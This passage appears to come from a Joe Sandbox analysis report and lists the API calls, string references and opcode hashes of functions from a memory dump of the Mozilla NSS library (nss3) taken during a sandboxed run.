                                                                                                                                                                                                                                                                                                                      • Instruction ID: 30e9b6d524a1d3e4759bdb62a0ce641a145b75715cb67852554a01b8a6dc37cc
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4af5f4d64cda4dc79cfa1e718f7967c0b155589e2409978cefb4b27ca9e784fb
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F313931B04755ABC700CF69C8D4AABBBA1AF4AB14B088555EE941BAE1D371FD04C7D4
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(?,00000000,00000000,?,?,6CEF2AE9,00000000,0000065C), ref: 6CF0A91D
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAADC0: TlsGetValue.KERNEL32(?,6CE8CDBB,?,6CE8D079,00000000,00000001), ref: 6CEAAE10
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAADC0: EnterCriticalSection.KERNEL32(?,?,6CE8CDBB,?,6CE8D079,00000000,00000001), ref: 6CEAAE24
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6CE8D079,00000000,00000001), ref: 6CEAAE5A
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CE8CDBB,?,6CE8D079,00000000,00000001), ref: 6CEAAE6F
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAADC0: free.MOZGLUE(85145F8B,?,?,?,?,6CE8CDBB,?,6CE8D079,00000000,00000001), ref: 6CEAAE7F
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAADC0: TlsGetValue.KERNEL32(?,6CE8CDBB,?,6CE8D079,00000000,00000001), ref: 6CEAAEB1
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CE8CDBB,?,6CE8D079,00000000,00000001), ref: 6CEAAEC9
                                                                                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(?,00000000,00000000,?,?,6CEF2AE9,00000000,0000065C), ref: 6CF0A934
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000000,00000000,00000000,?,?,6CEF2AE9,00000000,0000065C), ref: 6CF0A949
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?,00000000,0000065C), ref: 6CF0A952
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                                                                                                                                                                                                                                                      • String ID: *l
                                                                                                                                                                                                                                                                                                                      • API String ID: 1595327144-2445014310
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 9884503f6994a262c65b32e385a4ebb3be44b703ff99c0a1543432169102e71f
                                                                                                                                                                                                                                                                                                                      • Instruction ID: eb02c487ab1939b1a063a9bb5ad97a6644c36607bedf949f2486d05073580a21
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9884503f6994a262c65b32e385a4ebb3be44b703ff99c0a1543432169102e71f
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9C3137B57016019FDB04CF28D990E62BBF8FF48758B1582A9E8098F756E730E811CFA1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,00000000,00000000,?,6CE64C64,?,-00000004), ref: 6CE61EE2
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC1820: DER_GeneralizedTimeToTime_Util.NSS3(?,?,?,6CE61D97,?,?), ref: 6CEC1836
                                                                                                                                                                                                                                                                                                                      • DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,6CE64C64,?,-00000004), ref: 6CE61F13
                                                                                                                                                                                                                                                                                                                      • DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,6CE64C64,?,-00000004), ref: 6CE61F37
                                                                                                                                                                                                                                                                                                                      • DER_DecodeTimeChoice_Util.NSS3(?,dLl,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE64C64,?,-00000004), ref: 6CE61F53
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: TimeUtil$Choice_Decode$GeneralizedTime_
                                                                                                                                                                                                                                                                                                                      • String ID: dLl
                                                                                                                                                                                                                                                                                                                      • API String ID: 3216063065-3939847266
                                                                                                                                                                                                                                                                                                                      • Opcode ID: afb2bbce46d4b80a818772fe089993de175de2e97e04fb2b2cbd74dae5a85a46
                                                                                                                                                                                                                                                                                                                      • Instruction ID: e7497aa6e19b9693375cd2a10b93130238e59e4890af14108d999a34679fc5bd
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: afb2bbce46d4b80a818772fe089993de175de2e97e04fb2b2cbd74dae5a85a46
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB218372528215AFC701CEA6DD41A9BB7F9AF85699F10092DE854C3B40F330E519C7D3
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6CE50BDE), ref: 6CE50DCB
                                                                                                                                                                                                                                                                                                                      • strrchr.VCRUNTIME140(00000000,0000005C,?,6CE50BDE), ref: 6CE50DEA
                                                                                                                                                                                                                                                                                                                      • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6CE50BDE), ref: 6CE50DFC
                                                                                                                                                                                                                                                                                                                      • PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6CE50BDE), ref: 6CE50E32
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      • %s incr => %d (find lib), xrefs: 6CE50E2D
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: strrchr$Print_stricmp
                                                                                                                                                                                                                                                                                                                      • String ID: %s incr => %d (find lib)
                                                                                                                                                                                                                                                                                                                      • API String ID: 97259331-2309350800
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 2def9e872365b93462556835d2e7bd587434955c8cca49f53f9b489d9102a739
                                                                                                                                                                                                                                                                                                                      • Instruction ID: a224889b92a06362d51e7142b9498beb6b77838ad6ae225606a06dcb0ea79ea2
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2def9e872365b93462556835d2e7bd587434955c8cca49f53f9b489d9102a739
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6501F172B002149FEA208F249C45E1773B8DB45A0CB64442EE909D3B41EB62ED2486E1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(?,@]l,00000000,?,?,6CEE6AC6,?), ref: 6CF0AC2D
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAADC0: TlsGetValue.KERNEL32(?,6CE8CDBB,?,6CE8D079,00000000,00000001), ref: 6CEAAE10
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAADC0: EnterCriticalSection.KERNEL32(?,?,6CE8CDBB,?,6CE8D079,00000000,00000001), ref: 6CEAAE24
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6CE8D079,00000000,00000001), ref: 6CEAAE5A
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CE8CDBB,?,6CE8D079,00000000,00000001), ref: 6CEAAE6F
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAADC0: free.MOZGLUE(85145F8B,?,?,?,?,6CE8CDBB,?,6CE8D079,00000000,00000001), ref: 6CEAAE7F
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAADC0: TlsGetValue.KERNEL32(?,6CE8CDBB,?,6CE8D079,00000000,00000001), ref: 6CEAAEB1
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CE8CDBB,?,6CE8D079,00000000,00000001), ref: 6CEAAEC9
                                                                                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(?,@]l,00000000,?,?,6CEE6AC6,?), ref: 6CF0AC44
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,@]l,00000000,?,?,6CEE6AC6,?), ref: 6CF0AC59
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(8CB6FF01,6CEE6AC6,?,?,?,?,?,?,?,?,?,?,6CEF5D40,00000000,?,6CEFAAD4), ref: 6CF0AC62
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                                                                                                                                                                                                                                                      • String ID: @]l
                                                                                                                                                                                                                                                                                                                      • API String ID: 1595327144-728282480
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 9faae6f4d647ef3e734d690302653e0c76916472c2ad236e97ab1b161ec53a41
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 7f8441ca3eb713ec9e90aebb1991e83711ce1b5705805b1951dc5913115655f5
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9faae6f4d647ef3e734d690302653e0c76916472c2ad236e97ab1b161ec53a41
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF018BB56002009FDB00CF28E9D0B467BF8AF04B5CF18C068E8499F706D730E848CBA1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CDF9CF2
                                                                                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6CDF9D45
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CDF9D8B
                                                                                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6CDF9DDE
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 35fc4e6d62d9ff76454bbbcf3af445dd191d662e6371c0d6e06bf3a50e15a905
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 7b3d73c0b78e1a7f47b1793e9c1e23067fb0e8e9bb4e44e7f91c4d4ee959b4e1
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 35fc4e6d62d9ff76454bbbcf3af445dd191d662e6371c0d6e06bf3a50e15a905
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 45A1B271F54100CBEB48AF24E89877F3B75BF82314F1A012DD42647A64DB39D956CB92
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6CE81ECC
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: TlsGetValue.KERNEL32 ref: 6CF290AB
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: TlsGetValue.KERNEL32 ref: 6CF290C9
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: EnterCriticalSection.KERNEL32 ref: 6CF290E5
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: TlsGetValue.KERNEL32 ref: 6CF29116
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: LeaveCriticalSection.KERNEL32 ref: 6CF2913F
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CE81EDF
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CE81EEF
                                                                                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6CE81F37
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6CE81F44
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Value$CriticalEnterSection$Monitor$ExitLeaveUnlock
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3539092540-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 65def85a245c5f23df53fef96bb53d9631e6a3c88ec944b70d24c9857f44d0c0
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 2852a44ee61427b20157731bf0f36a0e668cb02283506644bbbff754ab9250b2
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 65def85a245c5f23df53fef96bb53d9631e6a3c88ec944b70d24c9857f44d0c0
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E71CE729053019FD710CF64D841A5AB7F1BF98358F244929E8A993B10E731F959CBA2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CF0DD8C
                                                                                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(00000000), ref: 6CF0DDB4
                                                                                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(00000000), ref: 6CF0DE1B
                                                                                                                                                                                                                                                                                                                      • ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6CF0DE77
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CriticalLeaveSection$ReleaseSemaphoreValue
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 2700453212-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 42cce693f32e3c782ea8b1460575493e8b28250755864655a5d469cb991bdaea
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 3369fa9a4d209537fd61059316266f878b4fed6c727fd71b90c34b3ca6a0726a
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 42cce693f32e3c782ea8b1460575493e8b28250755864655a5d469cb991bdaea
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 75716571A01318CFDB10CF9AC9E079AB7B4BF89B18F25816DD9596B702D770A941CF90
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE7AB10: DeleteCriticalSection.KERNEL32(D958E852,6CE81397,5B5F5EC0,?,?,6CE7B1EE,2404110F,?,?), ref: 6CE7AB3C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE7AB10: free.MOZGLUE(D958E836,?,6CE7B1EE,2404110F,?,?), ref: 6CE7AB49
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE7AB10: DeleteCriticalSection.KERNEL32(5D5E6D07), ref: 6CE7AB5C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE7AB10: free.MOZGLUE(5D5E6CFB), ref: 6CE7AB63
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE7AB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6CE7AB6F
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE7AB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6CE7AB76
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,6CE7B266,6CE815C6,?,?,6CE815C6), ref: 6CE7DFDA
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,6CE7B266,6CE815C6,?,?,6CE815C6), ref: 6CE7DFF3
                                                                                                                                                                                                                                                                                                                      • PK11_IsFriendly.NSS3(?,?,?,?,6CE7B266,6CE815C6,?,?,6CE815C6), ref: 6CE7E029
                                                                                                                                                                                                                                                                                                                      • PK11_IsLoggedIn.NSS3 ref: 6CE7E046
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE88F70: PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6CE7DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CE88FAF
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE88F70: PR_Now.NSS3(?,?,00000002,?,?,?,6CE7DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CE88FD1
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE88F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6CE7DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CE88FFA
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE88F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6CE7DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6CE89013
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE88F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6CE7DA9B,?,00000000,?,?,?,?,CE534353), ref: 6CE89042
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE88F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6CE7DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CE8905A
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE88F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6CE7DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6CE89073
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE88F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6CE7DA9B,?,00000000,?,?,?,?,CE534353), ref: 6CE89111
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,6CE7B266,6CE815C6,?,?,6CE815C6), ref: 6CE7E149
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CriticalSection$DeleteEnterK11_UnlockValuefree$FriendlyInternalLoggedSlot
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 4224391822-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 35f4a64cc6e14485884483de4468218a976c8a3f6b9b8e66f530a6c4ec360b69
                                                                                                                                                                                                                                                                                                                      • Instruction ID: dbda61ee767f5d643232f9be46fcc9c542e33e280e0ada36023c9a697344a17c
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 35f4a64cc6e14485884483de4468218a976c8a3f6b9b8e66f530a6c4ec360b69
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8515A75600B01CFDB20DF29C5887AABBF0BF45318F29895CD8999B741D731E885CBA2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,?,?), ref: 6CE8BF06
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CE8BF56
